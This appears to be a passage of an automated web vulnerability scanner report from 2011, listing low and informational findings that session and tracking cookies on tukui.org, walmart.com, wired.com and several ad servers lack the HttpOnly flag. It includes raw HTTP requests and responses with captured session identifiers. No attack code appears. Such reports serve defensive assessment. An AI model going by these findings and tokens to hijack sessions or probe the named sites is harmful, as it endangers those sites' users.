Date: Tue, 11 Jan 2011 14:07:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=qmis707mdaq9bcgqjvjtrnmke6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 12717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head>
<l
...[SNIP]...

11.26. http://www.tukui.org/v2/forums/register.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tukui.org
Path:	/v2/forums/register.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=rnddj5jg2uaifkgegn80melko7; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /v2/forums/register.php HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=rnddj5jg2uaifkgegn80melko7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6325
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...

11.27. http://www.walmart.com/x22 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.walmart.com
Path:	/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WMSessionID=00000005b4cc9e333fe1fb52cda733673fedc1581bb3a0ce_1294845992827_SSL203_10-15-97-102_1294845992827_10.95_N_; Domain=.walmart.com; Path=/
com.wm.visitor=12724351807; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
spcf.backup="|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
com.wm.anoncart=127243518071209880; Domain=.walmart.com; Expires=Sat, 09-Jan-2021 15:26:32 GMT; Path=/
spcf.backup="|com.wm.anoncart:127243518071209880|:|com.wm.visitor:12724351807|"; Version=1; Domain=.walmart.com; Path=/
cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1294845992829@firstcreate:1294845992829"; Version=1; Domain=.walmart.com; Path=/
NSC_xxx.xbmnbsu.dpn-mc=ffffffff090726f145525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.28. http://www.wired.com/services/corrections/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/corrections/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=acbAOmv50QXE_5DZY461s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/corrections/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=acbAOmv50QXE_5DZY461s; path=/
Content-Length: 54310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.29. http://www.wired.com/services/newsletters previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/newsletters

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/newsletters HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Expires: Wed, 12 Jan 2011 15:41:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:41:04 GMT
Content-Length: 31938
Connection: close
Set-Cookie: JSESSIONID=acbKlmpgDx9HsdHJY461s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...

11.30. http://www.wired.com/user/login previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login
Content-Length: 73
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:42 GMT
Connection: close
Set-Cookie: JSESSIONID=abcOkB-090FYf89-iN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/login">here</a>

11.31. http://www.wired.com/user/logout previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logout HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/logout
Content-Length: 74
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:46 GMT
Connection: close
Set-Cookie: JSESSIONID=cabyqTOw1aWnFbl3jN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/logout">here</a>

11.32. http://www.wired.com/user/registration previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wired.com
Path:	/user/registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/registration HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/registration
Content-Length: 80
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:04:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:04:58 GMT
Connection: close
Set-Cookie: JSESSIONID=abcPb5WLVvrzQ952mN41s; path=/

The URL has moved <a href="https://secure.wired.com/user/registration">here</a>

11.33. http://ad.crwdcntrl.net/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.crwdcntrl.net
Path:	/4/ct=y%7Cref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F%7Cto=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=fc847ad45efbbb25655a2972638271b3; Domain=.crwdcntrl.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.34. http://ad.doubleclick.net/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Mon, 10 Jan 2011 13:27:09 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.35. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.36. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.37. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.38. http://ad.insightexpressai.com/adserver/adServer.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.insightexpressai.com
Path:	/adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.39. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Fri, 11-Feb-2011 22:45:46 GMT; path=/
i_1=46:572:479:0:0:36939:1294785946:L; expires=Thu, 10-Feb-2011 22:45:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/572.479.tk.165x18/1294785946076317 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Tue, 11 Jan 2011 22:45:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Fri, 11-Feb-2011 22:45:46 GMT; path=/
Set-Cookie: i_1=46:572:479:0:0:36939:1294785946:L; expires=Thu, 10-Feb-2011 22:45:46 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

11.40. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.41. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:55 GMT
Connection: close

11.42. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close

11.43. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
C_000000087871816=4165551

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close

11.44. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
A2=fUFGa5OV02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
C_8865\=4164202

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1922091&Page=&PluID=0&Pos=8865\ HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-281/Type-0/7b4b3e72-c3e8-4733-aa25-3c5dffe10972.gif
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fUFGa5OV02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WGg410sI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_8865\=4164202
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:41 GMT
Connection: close

11.45. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
C_=BlankImage

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
